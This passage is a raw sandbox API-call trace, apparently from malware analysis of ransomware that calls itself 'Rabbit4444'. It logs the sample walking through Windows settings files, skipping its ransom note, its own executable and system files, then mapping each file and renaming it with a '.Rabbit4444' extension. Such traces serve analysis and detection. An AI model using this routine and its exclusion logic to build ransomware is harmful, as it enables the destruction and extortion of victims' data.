nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", cAlternateFileName="CLF02D~1.SET")) returned 1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2=".") returned 1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="..") returned 1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="windows") returned -1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="boot") returned 1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.220] lstrcmpiW (lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.220] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms" | out: lpString1="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms") returned="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms" [0058.220] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.221] lstrlenW (lpString="Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms") returned 64 [0058.221] lstrlenW (lpString="Rabbit4444") returned 10 [0058.221] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.221] lstrlenW (lpString=".dll") returned 4 [0058.221] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.221] lstrlenW (lpString=".lnk") returned 4 [0058.221] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.221] lstrlenW (lpString=".ini") returned 4 [0058.221] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.221] lstrlenW (lpString=".sys") returned 4 [0058.221] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06ff5ae9-8f7c-41ad-b71b-62137de26715}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.221] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.222] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14953228912) returned 1 [0058.222] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=983) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.222] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0058.222] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0058.223] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0058.224] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.224] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.224] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.224] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14953476408) returned 1 [0058.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0058.224] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.224] CloseHandle (hObject=0x298) returned 1 [0058.224] CloseHandle (hObject=0x278) returned 1 [0058.224] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms.Rabbit4444") returned 192 [0058.224] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06ff5ae9-8f7c-41ad-b71b-62137de26715}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{06ff5ae9-8f7c-41ad-b71b-62137de26715}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.225] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40809863, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x40809863, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", cAlternateFileName="CL2385~1.SET")) returned 1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2=".") returned 1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="..") returned 1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="windows") returned -1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="boot") returned 1 [0058.225] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.226] lstrcmpiW (lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.226] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms" | out: lpString1="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms") returned="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms" [0058.226] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.226] lstrlenW (lpString="Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms") returned 64 [0058.226] lstrlenW (lpString="Rabbit4444") returned 10 [0058.226] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.226] lstrlenW (lpString=".dll") returned 4 [0058.226] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.226] lstrlenW (lpString=".lnk") returned 4 [0058.226] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.226] lstrlenW (lpString=".ini") returned 4 [0058.226] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.226] lstrlenW (lpString=".sys") returned 4 [0058.226] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.226] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{082594d9-8481-43f0-ae8f-62ea920a4220}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.226] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.227] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14953727870) returned 1 [0058.227] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=981) returned 1 [0058.227] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.227] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0058.227] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0058.228] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0058.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.229] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14953978491) returned 1 [0058.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0058.229] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.229] CloseHandle (hObject=0x298) returned 1 [0058.229] CloseHandle (hObject=0x278) returned 1 [0058.229] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms.Rabbit4444") returned 192 [0058.229] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{082594d9-8481-43f0-ae8f-62ea920a4220}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{082594d9-8481-43f0-ae8f-62ea920a4220}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.230] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x409d34af, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x409d34af, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231f666f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x481, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", cAlternateFileName="CLD73B~1.SET")) returned 1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2=".") returned 1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="..") returned 1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="windows") returned -1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="boot") returned 1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.230] lstrcmpiW (lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.231] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms" | out: lpString1="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms") returned="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms" [0058.231] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.231] lstrlenW (lpString="Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms") returned 64 [0058.231] lstrlenW (lpString="Rabbit4444") returned 10 [0058.231] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.231] lstrlenW (lpString=".dll") returned 4 [0058.231] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.232] lstrlenW (lpString=".lnk") returned 4 [0058.232] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.232] lstrlenW (lpString=".ini") returned 4 [0058.232] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.232] lstrlenW (lpString=".sys") returned 4 [0058.232] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{083d5202-600a-4f38-981b-2d138fbdc4d1}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.232] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.232] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14954274468) returned 1 [0058.232] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1153) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0058.232] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0058.232] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0058.233] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0058.234] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.234] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.234] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.234] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.235] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.235] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.235] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.235] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14954547045) returned 1 [0058.235] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0058.235] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0058.235] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.235] CloseHandle (hObject=0x298) returned 1 [0058.235] CloseHandle (hObject=0x278) returned 1 [0058.235] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms.Rabbit4444") returned 192 [0058.235] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{083d5202-600a-4f38-981b-2d138fbdc4d1}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{083d5202-600a-4f38-981b-2d138fbdc4d1}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.236] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x412c41df, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x412c41df, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", cAlternateFileName="CLE0D3~1.SET")) returned 1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2=".") returned 1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="..") returned 1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="windows") returned -1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="boot") returned 1 [0058.236] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.237] lstrcmpiW (lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.237] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms" | out: lpString1="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms") returned="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms" [0058.237] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.237] lstrlenW (lpString="Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms") returned 64 [0058.237] lstrlenW (lpString="Rabbit4444") returned 10 [0058.237] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.237] lstrlenW (lpString=".dll") returned 4 [0058.237] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.237] lstrlenW (lpString=".lnk") returned 4 [0058.237] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.237] lstrlenW (lpString=".ini") returned 4 [0058.237] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.237] lstrlenW (lpString=".sys") returned 4 [0058.237] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{08d48377-1c06-416d-b382-61e8d5f6cd18}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.237] QueryPerformanceFrequency (in: 